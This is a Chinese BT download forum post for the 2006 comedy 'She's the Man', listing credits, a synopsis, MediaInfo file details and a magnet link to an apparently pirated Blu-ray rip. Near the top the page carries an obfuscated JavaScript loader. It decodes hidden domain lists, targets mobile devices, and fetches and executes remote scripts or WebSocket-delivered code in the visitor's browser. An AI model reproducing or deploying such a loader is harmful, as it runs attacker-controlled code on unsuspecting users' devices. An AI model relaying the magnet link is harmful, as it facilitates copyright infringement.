足球尤物[国语音轨/双语字幕]Shes.the.Man.2006.1080p.BluRay.DTS.2Audio.x265-10bit-迅雷下载 8.39GB

版主小s 19天前 645

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 足球尤物 / 球爱可人儿 / 她是个男人 / 假小子

◎片 名 She's the Man

◎年 代 2006

◎产 地 美国 / 加拿大

◎类 别 喜剧 / 爱情

◎语 言 英语

◎上映日期 2006-03-17(美国)

◎IMDb链接 https://www.imdb.com/title/tt0454945/

◎豆瓣评分 7.3/10 (59960人评价)

◎豆瓣链接 https://movie.douban.com/subject/1466897/

◎片 长 105 分钟

◎导 演 安迪·菲克曼 Andy Fickman (id:1274282)

◎编 剧 克尔斯滕·史密斯 Kirsten Smith (id:1023155)

◎演 员 阿曼达·贝尼斯 Amanda Bynes (id:1021996)

查宁·塔图姆 Channing Tatum (id:1031224)

劳拉·莱姆希 Laura Ramsey (id:1035638)

维尼·琼斯 Vinnie Jones (id:1013804)

大卫·克罗斯 David Cross (id:1071279)

朱丽·哈基提 Julie Hagerty (id:1018084)

罗伯特·霍夫曼 Robert Hoffman (id:1049540)

亚利桑德拉·布莱肯瑞吉 Alexandra Breckenridge (id:1219263)

乔纳森·萨多斯基 Jonathan Sadowski (id:1202232)

阿曼达·克鲁 Amanda Crew (id:1016614)

杰西卡·卢卡斯 Jessica Lucas (id:1027216)

布兰顿·杰·麦克拉伦 Brandon Jay McLaren (id:1208143)

詹姆斯·施奈德 James Snyder (id:1330202)

詹姆斯·柯克 James Kirk (id:1109192)

艾米莉·帕金斯 Emily Perkins (id:1129239)

芭芭拉·科特梅尔 Barbara Kottmeier (id:1327554)

罗伯特·托尔蒂 Robert Torti (id:1151942)

琳达·博伊德 Lynda Boyd (id:1055965)

凯蒂·斯图亚特 Katie Stuart (id:1148850)

Colby Wilson Colby Wilson (id:1170222)

杰弗里·巴拉德 Jeffrey Ballard (id:1062409)

Duncan Pattillo Duncan Pattillo (id:1184540)

Sandra-Jessica Couturier (id:1219261)

约翰·派珀-弗格森 John Pyper-Ferguson (id:1141539)

塔尼亚·索尔尼尔 Tania Saulnier (id:1138432)

Marty P. Ewing Marty P. Ewing (id:1283370)

劳伦·舒勒·唐纳 Lauren Shuler Donner (id:1009647)

加里·卢切西 Gary Lucchesi (id:1290411)

汤姆·罗森伯格 Tom Rosenberg (id:1296083)

Greg Gardiner Greg Gardiner (id:1284550)

Michael Jablow Michael Jablow (id:1287453)

萨拉·芬兰 Sarah Finn (id:1283741)

兰迪·希勒 Randi Hiller (id:1286647)

John R. Jensen John R. Jensen (id:1287690)

大卫·J·博姆巴 David J. Bomba (id:1278919)

Nina Paskowitz Nina Paskowitz (id:1294045)

吉特·阿克森 Gitte Axen (id:1058385)

彼得·罗勃-金 Peter Robb-King (id:1295741)

苏珊·波伊德 Susan Boyd (id:1069324)

Gordon Piper Gordon Piper (id:1309652)

Lee Pierce Lee Pierce (id:1202725)

Peter Hunt Peter Hunt (id:1287171)

西蒙·阿格 Simon Ager (id:1060292)

Trevor Strand Trevor Strand (id:1153655)

布莱恩·哈纳伯 Brian Hanable (id:1090997)

Paul Furminger Paul Furminger (id:1183163)

Jim O'Hagan Jim O'Hagan (id:1126364)

Lee Allan Lee Allan (id:1311803)

Mark Breakspear Mark Breakspear (id:1051779)

◎标 签 青春 / 喜剧 / 美国 / 校园 / 爱情 / 美国电影 / 足球 / 搞笑

◎简 介

维欧拉(阿曼达?贝尼斯饰)甜美可人,笑容如同一片金色阳光。但她可不是个娇滴滴的小女生。疯狂喜爱足球的她,一直把踢球当作梦想。谁知,可恶的学校竟然取消了女子球队。维欧拉为了继续她的足球梦,乔装成她的双胞胎哥哥赛巴斯蒂去新学校报道,并作为新生加入足球队,准备在球场上战胜那些轻视女孩的男球员们。然而从小女生变成男生可不是一件容易的事,维欧拉故作野蛮的样子着实让人又佩服又好笑。

在室友杜克(钱宁?塔图姆饰)的帮助下,维欧拉足球技术越来越出色。而不知不觉中,她竟爱上了这个和她朝夕相处的阳光大男孩。令人咋舌的是,学校的“万人迷”奥莉维娅竟然疯狂地为她着迷。一件件突发事件接踵而至,维欧拉不知所措。但她始终不变的,对足球的狂热,促使她硬着头皮也要向前走。爱情,足球,皆大欢喜还是全盘皆输?等待维欧拉,等待你我……

  1. General

  2. Unique ID : 28746862441836062619386024434041846771 (0x15A071BED99F9444F5813614073B7BF3)

  3. Complete name : [email protected]Q.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.39 GiB

  7. Duration : 1 h 45 min

  8. Overall bit rate : 11.4 Mb/s

  9. Movie name : Shes the Man 2006 1080p BluRay DTS 2Audio [email protected]

  10. Encoded date : UTC 2021-07-12 02:01:33

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 45 min

  20. Bit rate : 9 549 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.192

  30. Stream size : 7.02 GiB (84%)

  31. Title : @HDSky

  32. Writing library : x265 - H.265/HEVC codec

  33. Encoding settings : lslices=4 / deblock(tC=-1:B=-1)

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 45 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.11 GiB (13%)

  51. Title : English

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Audio #2

  56. ID : 3

  57. Format : AC-3

  58. Format/Info : Audio Coding 3

  59. Commercial name : Dolby Digital

  60. Codec ID : A_AC3

  61. Duration : 1 h 45 min

  62. Bit rate mode : Constant

  63. Bit rate : 256 kb/s

  64. Channel(s) : 2 channels

  65. Channel layout : L R

  66. Sampling rate : 48.0 kHz

  67. Frame rate : 31.250 FPS (1536 SPF)

  68. Compression mode : Lossy

  69. Stream size : 193 MiB (2%)

  70. Title : Mandarin

  71. Language : Chinese

  72. Service kind : Complete Main

  73. Default : No

  74. Forced : No


  75. Text #1

  76. ID : 4

  77. Format : PGS

  78. Muxing mode : zlib

  79. Codec ID : S_HDMV/PGS

  80. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration : 1 h 36 min

  82. Bit rate : 42.8 kb/s

  83. Count of elements : 3196

  84. Stream size : 29.7 MiB (0%)

  85. Title : ENG

  86. Language : English

  87. Default : Yes

  88. Forced : No


  89. Text #2

  90. ID : 5

  91. Format : PGS

  92. Muxing mode : zlib

  93. Codec ID : S_HDMV/PGS

  94. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  95. Duration : 1 h 38 min

  96. Bit rate : 28.7 kb/s

  97. Count of elements : 2899

  98. Stream size : 20.3 MiB (0%)

  99. Title : CHS

  100. Language : Chinese

  101. Default : No

  102. Forced : No


  103. Text #3

  104. ID : 6

  105. Format : PGS

  106. Muxing mode : zlib

  107. Codec ID : S_HDMV/PGS

  108. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  109. Duration : 1 h 38 min

  110. Bit rate : 29.4 kb/s

  111. Count of elements : 2899

  112. Stream size : 20.8 MiB (0%)

  113. Title : CHT

  114. Language : Chinese

  115. Default : No

  116. Forced : No


  117. Text #4

  118. ID : 7

  119. Format : PGS

  120. Muxing mode : zlib

  121. Codec ID : S_HDMV/PGS

  122. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  123. Duration : 1 h 38 min

  124. Bit rate : 52.7 kb/s

  125. Count of elements : 2899

  126. Stream size : 37.3 MiB (0%)

  127. Title : CHS&ENG

  128. Language : Chinese

  129. Default : No

  130. Forced : No


  131. Text #5

  132. ID : 8

  133. Format : PGS

  134. Muxing mode : zlib

  135. Codec ID : S_HDMV/PGS

  136. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  137. Duration : 1 h 38 min

  138. Bit rate : 53.4 kb/s

  139. Count of elements : 2899

  140. Stream size : 37.8 MiB (0%)

  141. Title : CHT&ENG

  142. Language : Chinese

  143. Default : No

  144. Forced : No


  145. Menu

  146. 00:00:00.000 : en:Chapter 01

  147. 00:05:50.934 : en:Chapter 02

  148. 00:12:14.108 : en:Chapter 03

  149. 00:16:57.600 : en:Chapter 04

  150. 00:19:50.272 : en:Chapter 05

  151. 00:23:19.231 : en:Chapter 06

  152. 00:28:29.875 : en:Chapter 07

  153. 00:32:33.535 : en:Chapter 08

  154. 00:38:32.352 : en:Chapter 09

  155. 00:44:29.792 : en:Chapter 10

  156. 00:51:38.846 : en:Chapter 11

  157. 00:56:14.079 : en:Chapter 12

  158. 01:02:44.219 : en:Chapter 13

  159. 01:09:15.860 : en:Chapter 14

  160. 01:13:45.379 : en:Chapter 15

  161. 01:18:22.031 : en:Chapter 16

  162. 01:25:15.152 : en:Chapter 17

  163. 01:31:18.848 : en:Chapter 18

  164. 01:34:48.182 : en:Chapter 19

  165. 01:40:29.148 : en:Chapter 20


TAGS 喜剧 爱情

磁力链:
  • magnet:?xt=urn:btih:FE1454ACC7A1F3B1EEF29130C7785EC0B7B448AE
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回